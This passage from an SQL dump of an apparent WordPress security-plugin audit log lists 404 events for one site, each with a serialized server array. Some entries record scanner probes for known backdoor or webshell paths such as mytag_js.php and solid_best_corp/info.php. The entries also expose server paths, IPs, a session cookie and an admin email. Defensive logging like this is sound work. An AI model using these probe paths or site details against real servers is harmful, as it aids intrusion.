+http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"127.23.166.135\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/plus/mytag_j.phpaid=6022\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydT7DTiPzaBc@31OE0TgAAARQ\";s:12:\"REDIRECT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"49743\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/plus/mytag_j.phpaid=6022\";s:10:\"SCRIPT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydT7DTiPzaBc@31OE0TgAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544975.9384\";s:12:\"REQUEST_TIME\";s:10:\"1570544975\";}}','notice','2019-10-08 14:29:37','2019-10-08 14:29:36',35043240,36850280,'https://bintara.com.my/plus/mytag_j.phpaid=6022',1,0,'119.187.228.206'),(27727,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/plus/mytag_js.php%20aid=9090\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"211.106.123.23\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4f1cecaa9891e13122f95ff251ff17a5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.106.123.23\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/plus/mytag_js.php aid=9090\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/plus/mytag_js.php aid=9090\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydXbDTiPzaBc@31OE0VwAAAQo\";s:12:\"REDIRECT_URL\";s:27:\"/plus/mytag_js.php aid=9090\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"50806\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/plus/mytag_js.php aid=9090\";s:10:\"SCRIPT_URL\";s:27:\"/plus/mytag_js.php aid=9090\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydXbDTiPzaBc@31OE0VwAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544990.0405\";s:12:\"REQUEST_TIME\";s:10:\"1570544990\";}}','notice','2019-10-08 14:29:51','2019-10-08 14:29:50',35042160,36841720,'https://bintara.com.my/plus/mytag_js.php%20aid=9090',1,0,'211.106.123.23'),(28215,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571310150.4397220611572265625000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571310150.4397220611572265625000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571310150.4397220611572265625000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571310150.4397220611572265625000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"49802\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571310150.4397220611572265625000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahKRgDM-LBvHfklr3kgUwAAAEo\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahKRgDM-LBvHfklr3kgUwAAAEo\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"49802\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XahKRgDM-LBvHfklr3kgUwAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571311056.4913\";s:12:\"REQUEST_TIME\";s:10:\"1571311056\";}}','notice','2019-10-17 11:17:39','2019-10-17 11:17:36',35044864,35297048,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571310150.4397220611572265625000',1,0,'103.6.198.69'),(28217,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/send-quote-teamviewer/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahYEADM-LBvHfklr3kj2wAAAFA\";s:12:\"REDIRECT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.54\";s:11:\"REMOTE_PORT\";s:5:\"10288\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:10:\"SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XahYEADM-LBvHfklr3kj2wAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571313680.6106\";s:12:\"REQUEST_TIME\";s:10:\"1571313680\";}}','notice','2019-10-17 12:01:23','2019-10-17 12:01:20',34386592,36186104,'https://bintara.com.my/send-quote-teamviewer/',1,0,'40.77.167.54'),(28216,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58841\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XahRuyA4FyKWClMkejuhigAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571312067.1017\";s:12:\"REQUEST_TIME\";s:10:\"1571312067\";}}','notice','2019-10-17 11:34:41','2019-10-17 11:34:29',35412136,37223048,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28224,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/dev/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/dev/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xah6UwSv6QovRW0DK2lFOQAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/dev/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xah6UwSv6QovRW0DK2lFOQAAAMk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"60368\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:48:\"/dev/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xah6UwSv6QovRW0DK2lFOQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571322452.0518\";s:12:\"REQUEST_TIME\";s:10:\"1571322452\";}}','notice','2019-10-17 14:27:33','2019-10-17 14:27:32',35042128,36845104,'https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/info.php',1,0,'151.80.54.15'),(28218,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/blogs/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:50:\"/blogs/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahlyQSv6QovRW0DK2lCkQAAAMM\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/blogs/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahlyQSv6QovRW0DK2lCkQAAAMM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"48225\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:50:\"/blogs/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahlyQSv6QovRW0DK2lCkQAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571317193.5481\";s:12:\"REQUEST_TIME\";s:10:\"1571317193\";}}','notice','2019-10-17 12:59:55','2019-10-17 12:59:54',35271840,37072520,'https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/info.php',1,0,'5.135.138.188'),(28219,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahmByA4FyKWClMkejur-QAAAIQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahmByA4FyKWClMkejur-QAAAIQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"55578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s: